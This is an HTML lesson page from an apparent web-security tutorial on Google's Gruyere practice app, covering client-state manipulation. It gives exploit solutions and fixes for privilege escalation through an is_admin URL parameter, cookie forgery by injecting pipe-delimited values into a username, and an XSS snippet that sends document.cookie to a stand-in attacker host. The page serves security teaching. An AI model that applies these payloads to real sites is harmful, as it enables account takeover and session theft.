<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8">
        <link rel="stylesheet" href="style_sheet.css">
    </head>
    <body>
        <!-- Debugging : Better way to skip through! -->
        <a href="./xs.html">&#60;= Previous</a>
        <!---------------------------------------------------->
        <h2>Client-State Manipulation</h2>
        <p>
            When a user interacts with a web application, they do it indirectly through a browser. When the user clicks a button or submits a form (like a login), the browser sends a request back to the web server. 
            Because the browser runs on a machine that could be controlled by an attacker, an application must not trust any data sent by the browser.<br>
            <br>
            If a user submits a form that says as an example what they want to purchase, it's OK to trust that data. But if the submitted form includes the price of the item, that's something that cannot be trusted.
            Client-state manipulation exploits this vulnerability in different ways.
        </p>
        <!---------------------------------------------------->
        <h4>Elevation of Privilege</h4>
        <!-- Task 1 -->
            <h5><img src="./img/hacking_type_1.png" style="width: 1.5%; vertical-align: sub;">Convert your account into an administrator account.</h5>
            <!-- Hint 1.1 -->
            <details>
                <summary>Hint 1 (Approach)</summary>
                <p>
                    Users and administrators use the <a href="https://google-gruyere.appspot.com/code/?resources/editprofile.gtl" target="_blank">editprofile.gtl</a> page to edit profile settings.<br>
                    Is it possible to trick Gruyere into letting you use this page to update your account?
                </p>
            </details>

            <!-- Hint 1.2 -->
            <details>
                <summary>Hint 2 (Execution)</summary>
                <p>
                    What URL is given as response for updating the profile?
                    Can you add specific attributes to it?
                </p>
            </details>
            
            <br>

            <!-- Solution 1.1 -->
            <details>
                <summary>Solution: Exploit</summary>
                <p>
                    You can convert your account into an administrator account by issuing the following request via URL:
                    <code>https://google-gruyere.appspot.com/-uniqueID-/saveprofile?action=update&is_admin=True</code>
                    After visiting this URL, your account is an administrator account after the next login. It is not instantly an<br>
                    administrator account because of saved cookies in your browser and the system.
                </p>
            </details>

            <!-- Solution 1.2 -->
            <details>
                <summary>Solution: Fix</summary>
                <p>
                    The problem is that there is no validation on the server side. Every request is handled equally.<br>
                    Therefore a authorization/permission check needs to be constructed on the server side, as soon as the server receives a request.<br>
                </p>
            
            </details>

        <!---------------------------------------------------->
        <h4>Cookie Manipulation</h4>
        <p>
            The HTTP protocol is stateless. Therefore a server doesn't know if two request came from the same client or from two totally different clients.<br>
            When a website includes a <strong>cookie</strong> (which is just an arbitrary string) in a HTTP response, the browser automatically sends the cookie back to the browser on the next request.<br>
            Websites can use this technique to save session data (like the state "logged in" if you change the page).<br>
            <br>
            Cookies are stored on the client side, so they are vulnerable to manipulation.
        </p>
        <!-- Task 2 -->
            <h5><img src="./img/hacking_type_2.png" style="width: 1.5%; vertical-align: sub;">Get Gruyere to issue you a cookie for someone else's account.</h5>

            <!-- Hint 2.1 -->
            <details>
                <summary>Hint 1 (Approach)</summary>
                <p>
                    Gruyere's cookies use the format:<br>
                    <code>hash|username|admin|author</code>
                    Gruyere issues a cookie when you log in.
                </p>
            </details>

            <!-- Hint 2.2 -->
            <details>
                <summary>Hint 2 (Execution)</summary>
                <p>
                    Can you somehow <strong>log in</strong> with a cookie?<br>
                    What are the possibilities?
                </p>
            </details>
            <br>

            <!-- Solution 2.1 -->
            <details>
                <summary>Solution: Exploit</summary>
                <p>
                    <ul>
                        <li>
                            <p>
                                You can get Gruyere to issue you a cookie for someone else's account by creating a new account with the username<br>
                                <var>foo|admin|author</var>. When you log into this account, it will issue you the cookie <var>hash|foo|admin|author||author</var> which<br>
                                actually logs you into the account of a user <var>foo</var> as an administrator.<br>
                            </p>
                        </li>
                        <li>
                            <p>
                                The 16 character limit is implemented on the client side. Just issue your own request:<br>
                                <code>
                                    https://google-gruyere.appspot.com/-uniqueID-/saveprofile?action=new&uid=administrator|admin|author&pw=secret
                                </code>
                            </p>
                        </li>
                    </ul>
                </p>
            </details>

            <!-- Solution 2.2 -->
            <details>
                <summary>Solution: Fix</summary>
                <p>
                    <ul>
                        <li>
                            Having no restrictions on the characters allowed in usernames means that we have to be careful when we handle them.<br>
                            In this case, the cookie parsing code is tolerant of malformed cookies but it shouldn't be.<br>
                            It should escape the username when it constructs the cookie and it should reject a cookie if it doesn't match the exact pattern it is expecting.<br>
                            <br>
                            Even if we fix this, Python's hash function is not cryptographically secure.<br>
                            If you look at Python's <var>string_hash</var> function (located in the source code of Python 2.7 in file <a href="https://github.com/python/cpython/blob/2.7/Objects/stringobject.c#L1274" target="_blank">Objects/stringobject.c</a>) you'll see that it hashes the string strictly from left to right. <br>
                            That means that we don't need to know the cookie secret to generate our own hashes; all we need is another string that hashes to the same value, which we can find in a relatively short time on a typical PC.<br>
                            In contrast, with a cryptographic hash function, changing any bit of the string will change many bits of the hash value in an unpredictable way. <br>
                            At a minimum, you should use a secure hash function to protect your cookies. You should also consider encrypting the entire cookie as plain text cookies can expose information you might not want exposed.<br>
                            <br>
                            And these cookies are also vulnerable to a replay attack. Once a user is issued a cookie, it's good forever and there's no way to revoke it.<br>
                            So if a user is an administrator at one time, they can save the cookie and continue to act as an administrator even if their administrative rights are taken away.<br>
                            While it's convenient to not have to make a database query in order to check whether or not a user is an administrator, that might be too dangerous a detail to store in the cookie.<br>
                            If avoiding additional database access is important, the server could cache a list of recent admin users. Including a timestamp in a cookie and expiring it after some period of time also mitigates the risk of a replay attack.<br>
                        </li>
                        <li>
                            The character limit should (also) be implemented on the server side.
                        </li>
                    </ul>
                </p>
            </details>

        <!---------------------------------------------------->
        <h4>Cookie Tampering via XSS</h4>
        <p>
            Since cookies are stored on the client side, they are especially vulnerable to XSS attacks, since they can be accessed by JavaScript, if not prohibited somehow.
        </p>
        <!-- Task 3 -->
            <h5><img src="./img/hacking_type_0.png" style="width: 1.5%; vertical-align: sub;">How can you steal the cookie of some user via XSS?</h5>

            <!-- Hint 3.1 -->
            <details>
                <summary>Hint 1 (Approach)</summary>
                <p>
                    The <var>document</var> object in the Document Object Model (DOM) has an attribute <var>cookies</var> that can be accessed by JavaScript with:<br>
                    <code>document.cookie</code>
                </p>
            </details>

            <!-- Hint 3.2 -->
            <details>
                <summary>Hint 2 (Execution)</summary>
                <p>
                    How can you make a script being executed in the victim's browser which posts the victim's cookie somewhere without letting them notice?
                </p>
            </details>

            <!-- Hint 3.2 -->
            <details>
                <summary>Hint 3 (Fix)</summary>
                <p>
                    Is there some <strong>cookie attribute</strong> that could help here?
                </p>
            </details>
            <br>

            <!-- Solution 3.1 -->
            <details>
                <summary>Solution: Exploit</summary>
                <p>
                    <ul>
                        <li>
                            <p>
                                You can use one of the approaches from the XSS part of the codelab to execute JavaScript code when the user views the attacker's snippets.<br>
                                In the script, you can access the cookie and post it to some website under the attacker's control, e.g., via AJAX (see following example) or via a submitted form.
                            </p>
                            <p>
                                <code>
                                    const Http = new XMLHttpRequest(); <br>
                                    Http.open('GET', 'https://attackers.home/send?message=' + document.cookie); <br>
                                    Http.send(); <br>
                                </code>
                            </p>
                        </li>
                    </ul>
                </p>
            </details>

            <!-- Solution 3.2 -->
            <details>
                <summary>Solution: Fix</summary>
                <p>
                    <ul>
                        <li>
                            The server should at least use the attribute <strong>HttpOnly</strong> so the cookie can not be accessed on the client side via JavaScript.
                        </li>
                    </ul>
                </p>
            </details>

        <!---------------------------------------------------->
        <h4>Securing Cookies</h4>
        <p>
            There are some ways to prevent cookie tampering. Amonst other approaches, cookies can be secured by setting specific 
            <strong>cookie attributes</strong>. These attributes are: 
            <strong>Secure</strong>, <strong>Domain</strong>, <strong>Path</strong>, <strong>HTTPOnly</strong>, <strong>Expires</strong>. 
            Find out what each of these attributes means and which vulnerability or kinds of attack each of them counteracts.
        </p>

        <hr>
        <!-- Debugging : Better way to skip through! -->
        <a href="./path_traversal.html">Continue =></a>
    </body>
</html>